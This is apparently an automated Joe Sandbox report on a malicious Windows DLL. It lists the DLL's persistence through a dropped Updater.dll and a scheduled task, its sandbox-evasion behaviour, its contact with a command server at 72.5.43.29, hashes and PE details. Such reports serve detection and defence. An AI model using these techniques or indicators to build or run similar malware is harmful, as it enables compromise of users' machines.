Source: akdn2nefd.bin.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: akdn2nefd.bin.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: akdn2nefd.bin.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: akdn2nefd.bin.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: akdn2nefd.bin.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: akdn2nefd.bin.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\work\ooooooops\181\knock_v1.1.8\knock\bin64\knock.pdb source: rundll32.exe, 00000004.00000003.1777532301.0000016C8D400000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1778367651.0000016C8D405000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp, akdn2nefd.bin.dll, Updater.dll.4.dr
Source: akdn2nefd.bin.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: akdn2nefd.bin.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: akdn2nefd.bin.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: akdn2nefd.bin.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: akdn2nefd.bin.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE115015B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,swprintf,FindFirstFileW,FindNextFileW,FindClose,8_2_00007FFE115015B0
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\akdn2nefd.bin.dll

Persistence and Installation Behavior

barindex
Creates files in the system32 config directory
Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\OAPIRH2O.htmJump to behavior
Drops HTML or HTM files to system directories
Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\OAPIRH2O.htmJump to behavior
Source: C:\Windows\System32\rundll32.exeFile created: C:\ProgramData\Ventuso LLC\Updater.dllJump to dropped file
Source: C:\Windows\System32\rundll32.exeFile created: C:\ProgramData\Ventuso LLC\Updater.dllJump to dropped file
Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\Tasks\Ventuso LLC.jobJump to behavior
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE115074E0 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,SetProcessDPIAware,DeleteObject,8_2_00007FFE115074E0
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\System32\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_8-9564
Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 9728Jump to behavior
Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\ProgramData\Ventuso LLC\Updater.dllJump to dropped file
Source: C:\Windows\System32\loaddll64.exe TID: 7320Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7572Thread sleep count: 237 > 30Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7572Thread sleep time: -237000s >= -30000sJump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7572Thread sleep count: 9728 > 30Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7572Thread sleep time: -9728000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\rundll32.exeLast function: Thread delayed
Source: C:\Windows\System32\rundll32.exeLast function: Thread delayed
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE115015B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,swprintf,FindFirstFileW,FindNextFileW,FindClose,8_2_00007FFE115015B0
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE11511610 FindFirstFileExA,8_2_00007FFE11511610
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE115019C0 GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,8_2_00007FFE115019C0
Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE1150A088 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFE1150A088
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE115015B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,swprintf,FindFirstFileW,FindNextFileW,FindClose,8_2_00007FFE115015B0
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE11506980 GetProcessHeap,RtlRestoreThreadPreferredUILanguages,8_2_00007FFE11506980
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE11509564 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FFE11509564
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE1150A088 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFE1150A088
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE1150ECD0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFE1150ECD0

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 72.5.43.29 80Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1Jump to behavior
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE11517C10 cpuid 8_2_00007FFE11517C10
Source: C:\Windows\System32\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE11509F8C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,8_2_00007FFE11509F8C
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE115050D0 GetVolumeInformationW,GetComputerNameW,GetComputerNameExW,GetUserNameW,OpenMutexW,CloseHandle,GetTickCount,SleepEx,8_2_00007FFE115050D0
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE115069F0 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,RtlGetVersion,GetNativeSystemInfo,GetSystemInfo,GetSystemMetrics,8_2_00007FFE115069F0

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Scheduled Task/Job		1
Scheduled Task/Job		111
Process Injection		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Screen Capture		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts11
Native API		1
DLL Side-Loading		1
Scheduled Task/Job		11
Virtualization/Sandbox Evasion		LSASS Memory121
Security Software Discovery		Remote Desktop Protocol1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		111
Process Injection		Security Account Manager11
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Regsvr32		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Rundll32		LSA Secrets1
Account Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials1
System Owner/User Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
File Deletion		DCSync1
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem34
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1493196 Sample: akdn2nefd.bin.dll Startdate: 15/08/2024 Architecture: WINDOWS Score: 76 29 Multi AV Scanner detection for dropped file 2->29 31 Multi AV Scanner detection for submitted file 2->31 7 rundll32.exe 13 2->7         started        11 loaddll64.exe 1 2->11         started        process3 dnsIp4 27 72.5.43.29, 49730, 49731, 49734 UNASSIGNED United States 7->27 35 System process connects to network (likely due to code injection or exploit) 7->35 37 Creates files in the system32 config directory 7->37 39 Drops HTML or HTM files to system directories 7->39 13 cmd.exe 1 11->13         started        15 rundll32.exe 11->15         started        17 rundll32.exe 11->17         started        19 3 other processes 11->19 signatures5 process6 process7 21 rundll32.exe 4 13->21         started        file8 25 C:\ProgramData\Ventuso LLC\Updater.dll, PE32+ 21->25 dropped 33 Found evasive API chain (may stop execution after checking mutex) 21->33 signatures9

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
akdn2nefd.bin.dll13%ReversingLabs
akdn2nefd.bin.dll12%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\ProgramData\Ventuso LLC\Updater.dll13%ReversingLabs
C:\ProgramData\Ventuso LLC\Updater.dll12%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://72.5.43.29/Rt#0%Avira URL Cloudsafe
http://72.5.43.29/20%Avira URL Cloudsafe
http://72.5.43.29/0%Avira URL Cloudsafe
http://72.5.43.29/pt0%Avira URL Cloudsafe
http://72.5.43.29/5.43.29/ttingsE0%Avira URL Cloudsafe
http://72.5.43.29/Gt80%Avira URL Cloudsafe
http://72.5.43.29/ttings0%Avira URL Cloudsafe
http://72.5.43.29/$0%Avira URL Cloudsafe
http://72.5.43.290%Avira URL Cloudsafe
http://72.5.43.29/#tT0%Avira URL Cloudsafe
http://72.5.43.292%VirustotalBrowse
http://72.5.43.29/#tT2%VirustotalBrowse
http://72.5.43.29/2%VirustotalBrowse

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://72.5.43.29/true
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://72.5.43.29/Rt#rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://72.5.43.29/2rundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://72.5.43.29/ptrundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://72.5.43.29/5.43.29/ttingsErundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://72.5.43.29/Gt8rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://72.5.43.29/ttingsrundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://72.5.43.29/$rundll32.exe, 00000008.00000002.3508798808.00000240CE898000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://72.5.43.29rundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmpfalse
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://72.5.43.29/#tTrundll32.exe, 00000008.00000002.3508798808.00000240CE85B000.00000004.00000020.00020000.00000000.sdmpfalse
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

World Map of Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public IPs

IPDomainCountryFlagASNASN NameMalicious
72.5.43.29
unknownUnited States
16769UNASSIGNEDtrue

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1493196
Start date and time:2024-08-15 05:28:30 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 39s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:Run with higher sleep bypass
Number of analysed new started processes analysed:13
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:akdn2nefd.bin.dll
renamed because original name is a hash value
Original Sample Name:akdn2nefd.bin.exe
Detection:MAL
Classification:mal76.evad.winDLL@15/4@0/1
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 23
  • Number of non-executed functions: 40
Cookbook Comments:
  • Found application associated with file extension: .dll
  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

TimeTypeDescription
23:30:05API Interceptor9804378x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
72.5.43.29random.dll.dllGet hashmaliciousUnknownBrowse
  • 72.5.43.29/
1337.jsGet hashmaliciousUnknownBrowse
  • 72.5.43.29/
random.dll.dllGet hashmaliciousUnknownBrowse
  • 72.5.43.29/

Domains

No context

ASNs

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
UNASSIGNEDrandom.dll.dllGet hashmaliciousUnknownBrowse
  • 72.5.43.29
1337.jsGet hashmaliciousUnknownBrowse
  • 72.5.43.29
random.dll.dllGet hashmaliciousUnknownBrowse
  • 72.5.43.29
b3astmode.arm.elfGet hashmaliciousMiraiBrowse
  • 160.79.173.248
hoho.arm.elfGet hashmaliciousMiraiBrowse
  • 38.135.252.253
arm.elfGet hashmaliciousMiraiBrowse
  • 153.10.195.253
https://survey.zohopublic.com/zs/PYD30j?zs_inviteid=866013344e2f6aaa30b0ce407809ff4bd0ed3ef0b6c505e4b8ed99944a376aa9926823bc48ddf2b3a48337595fd132fdc7dd78d5f9b555e70f8018a33749ece953593d840363543c7e497cb3df5edd8a8ce77772c184384877cf08b30c571942a82188865861cee4768abdb6a85121effaf9893caa395668bdc7d2ea3eb1ad70842f3852386887fd2152473c96af2d214aa22073b82ef4bd897283936adbc27354514f9b6787d1b60b4d554452880bf6Get hashmaliciousUnknownBrowse
  • 199.67.84.65
arm7-20240807-1021.elfGet hashmaliciousMiraiBrowse
  • 156.134.164.94
botx.arm.elfGet hashmaliciousMiraiBrowse
  • 205.231.152.65

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Ventuso LLC\Updater.dll

Download File
Process:C:\Windows\System32\rundll32.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):159232
Entropy (8bit):6.126578601529484
Encrypted:false
SSDEEP:3072:0lCt2jrijQEjnMUWzsjhVPbuGHUluQj6vkZD4vP5iZWyPr:QCIrijNMv6XPbr0kulr
MD5:59B7B8D29252A9128536FBD08D24375F
SHA1:7221B9125608A54F9DD706166F936C16EE23164A
SHA-256:B7AEC5F73D2A6BBD8CD920EDB4760E2EDADC98C3A45BF4FA994D47CA9CBD02F6
SHA-512:70431E0BF3759194CD50F6B567F6DE7C908D13A444D14E7B35EDF10FD88F16E6FE8BF0899307C7215F1EE80FF8E5909211864F4184053D9FA5BF9EC22B1D9CD4
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 13%
  • Antivirus: Virustotal, Detection: 12%, Browse
Reputation:low
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....~.X.........." .....|..........p.....................................................`..........................................$......X%..x.......................................T...........................0................................................text....z.......|.................. ..`.rdata.............................@..@.data...X?...@...,..."..............@....pdata...............N..............@..@.gfids...............b..............@..@.rsrc................d..............@..@.reloc...............f..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Ventuso LLC\Updater.dll:Zone.Identifier

Download File
Process:C:\Windows\System32\rundll32.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:false
Reputation:high, very likely benign file
Preview:[ZoneTransfer]....ZoneId=0

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\OAPIRH2O.htm

Download File
Process:C:\Windows\System32\rundll32.exe
File Type:data
Category:dropped
Size (bytes):32
Entropy (8bit):5.0
Encrypted:false
SSDEEP:3:4E6CDri/ENGHn:J6C/ikGHn
MD5:CD337FC63F7D36B9B22881FE45278BBB
SHA1:DBA77555B1E7DD52CB5DDB298B8558DD071F26F6
SHA-256:DFF7255B90139FBC8D3E76F31B480E65FC3EB7F49F70E7876CFB3F1CB56E5123
SHA-512:30E5A2E6147BDF86FB98E00630FF46C0C08D334E9E13CCA16D6535367C5C388C5701889068C1CF11D8E171F125F5FF00B0BC1FD30CA9115774D9CFF5A0FB1218
Malicious:false
Preview:..9..i..V5.f...x&s2.n.....6"

C:\Windows\Tasks\Ventuso LLC.job

Download File
Process:C:\Windows\System32\rundll32.exe
File Type:data
Category:modified
Size (bytes):338
Entropy (8bit):3.568775131260989
Encrypted:false
SSDEEP:6:A+rEsU/82On+SkSJkJAWhAlAtWlubhEZxDh5JDiAjgsW2YRZuy0lWKuV1:A2UhO+fTWlj0b69uAjzvYRQV2
MD5:076377E1702EC729434E5CAE4E7AB54F
SHA1:4BA7BB7EDB9DA0D1B6A71B9F240A7277291028A0
SHA-256:2CFBFA3357D2059DCD05A34AF2A4DF36E0FF3D8753F28A84DBB07A9CD218EA94
SHA-512:9B0A9E338D0B527B0BCBFFF2BDD5A9749A44B6376ADEE60DB56CCE1196410B31D231541CF495999587B46ECA5A043F8AC4E49740EA468FEF78C66EFDABF5F233
Malicious:false
Preview:.......Xw.D.Z...mBF. .....<... .....\.......... ....................!.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.r.u.n.d.l.l.3.2...e.x.e...2.".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.V.e.n.t.u.s.o. .L.L.C.\.U.p.d.a.t.e.r...d.l.l.".,.S.t.a.r.t. ./.u.......J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...............................................

Static File Info

General

File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Entropy (8bit):6.126578601529484
TrID:
  • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
  • Win64 Executable (generic) (12005/4) 10.17%
  • Generic Win/DOS Executable (2004/3) 1.70%
  • DOS Executable Generic (2002/1) 1.70%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
File name:akdn2nefd.bin.dll
File size:159'232 bytes
MD5:59b7b8d29252a9128536fbd08d24375f
SHA1:7221b9125608a54f9dd706166f936c16ee23164a
SHA256:b7aec5f73d2a6bbd8cd920edb4760e2edadc98c3a45bf4fa994d47ca9cbd02f6
SHA512:70431e0bf3759194cd50f6b567f6de7c908d13a444d14e7b35edf10fd88f16e6fe8bf0899307c7215f1ee80ff8e5909211864f4184053d9fa5bf9ec22b1d9cd4
SSDEEP:3072:0lCt2jrijQEjnMUWzsjhVPbuGHUluQj6vkZD4vP5iZWyPr:QCIrijNMv6XPbr0kulr
TLSH:2BF32947F6A210EBE9B6C635C9632527FB72385543309B9F4B5446225F237A0EE3DB20
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....~.X.........." .....|..........p.....................................................`................................

File Icon

Icon Hash:7ae282899bbab082

Static PE Info

General

Entrypoint:0x180009b70
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x180000000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x58DA7EDB [Tue Mar 28 15:18:51 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:4e07c2fd62376d20191892e1e1215fcd

Entrypoint Preview

Instruction
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], esi
push edi
dec eax
sub esp, 20h
dec ecx
mov edi, eax
mov ebx, edx
dec eax
mov esi, ecx
cmp edx, 01h
jne 00007FC13143F4A7h
call 00007FC13143F8A0h
dec esp
mov eax, edi
mov edx, ebx
dec eax
mov ecx, esi
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov esi, dword ptr [esp+38h]
dec eax
add esp, 20h
pop edi
jmp 00007FC13143F2F8h
int3
int3
int3
dec eax
sub esp, 28h
call 00007FC13143FD28h
test eax, eax
je 00007FC13143F4C3h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007FC13143F4A7h
dec eax
cmp ecx, eax
je 00007FC13143F4B6h
xor eax, eax
dec eax
cmpxchg dword ptr [0001D744h], ecx
jne 00007FC13143F490h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007FC13143F499h
int3
int3
int3
dec eax
sub esp, 28h
call 00007FC13143FCECh
test eax, eax
je 00007FC13143F4A9h
call 00007FC13143FB17h
jmp 00007FC13143F4BBh
call 00007FC13143FCD4h
mov ecx, eax
call 00007FC1314432B5h
test eax, eax
je 00007FC13143F4A6h
xor al, al
jmp 00007FC13143F4A9h
call 00007FC13144363Ch
mov al, 01h
dec eax
add esp, 28h
ret
dec eax
sub esp, 28h
xor ecx, ecx
call 00007FC13143F5E6h
test al, al
setne al
dec eax
add esp, 28h
ret
int3
int3

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x224a00xb8.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT0x225580x78.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x2b0000x1e0.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x280000x12cc.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x2c0000x690.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x210d00x54.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x211300x94.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x190000x380.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x17a900x17c00f1d3c7eb2b4d49aa3c3ced10e0bd2582False0.5224506578947369zlib compressed data6.1893577299368605IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata0x190000xa0f20xa200d6dd4741e9f4e7b1e9121e139cf8adffFalse0.4664351851851852data5.141780189939127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x240000x3f580x2c007c391c5554799b2ddffd0a84cab3699dFalse0.5725319602272727data5.855319176049921IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata0x280000x12cc0x1400268043d954d9b8d2fdd1f259ed50df3eFalse0.466796875data4.948893002562717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gfids0x2a0000x9c0x2009d4de97bca792c2fa369b12a77272c07False0.25data1.4611336356506455IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc0x2b0000x1e00x20094a4bdad46cd2ba4a61ce55d564521bfFalse0.53125data4.720822661998389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x2c0000x6900x80062240c37dc88fd19e8b20ab1a756d13dFalse0.53515625data4.932993216789583IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountryZLIB Complexity
RT_MANIFEST0x2b0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

Imports

DLLImport
